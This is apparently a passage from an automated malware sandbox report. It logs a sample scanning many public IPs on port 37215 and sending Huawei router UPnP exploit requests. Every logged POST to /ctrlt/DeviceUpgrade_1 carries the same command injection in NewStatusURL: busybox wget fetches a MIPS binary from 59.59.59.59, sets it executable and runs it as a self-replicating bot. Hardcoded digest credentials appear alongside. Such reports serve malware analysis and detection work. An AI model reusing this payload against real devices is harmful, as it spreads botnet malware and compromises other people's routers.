20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1581192.168.2.1556066157.78.171.5937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.927160978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1582192.168.2.1536952122.195.200.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.927299023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1583192.168.2.1558820197.189.182.5737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.927342892 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1584192.168.2.1546442142.233.152.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.929939032 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1585192.168.2.1536610223.77.104.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.932662010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1586192.168.2.155629041.34.233.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.932684898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1587192.168.2.1542594173.195.90.24837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.932713032 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1588192.168.2.1535590161.150.21.11937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.932912111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1589192.168.2.1544384157.190.144.18737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.932926893 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1590192.168.2.155685441.31.201.21237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.938314915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1591192.168.2.153631641.151.192.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.860445976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
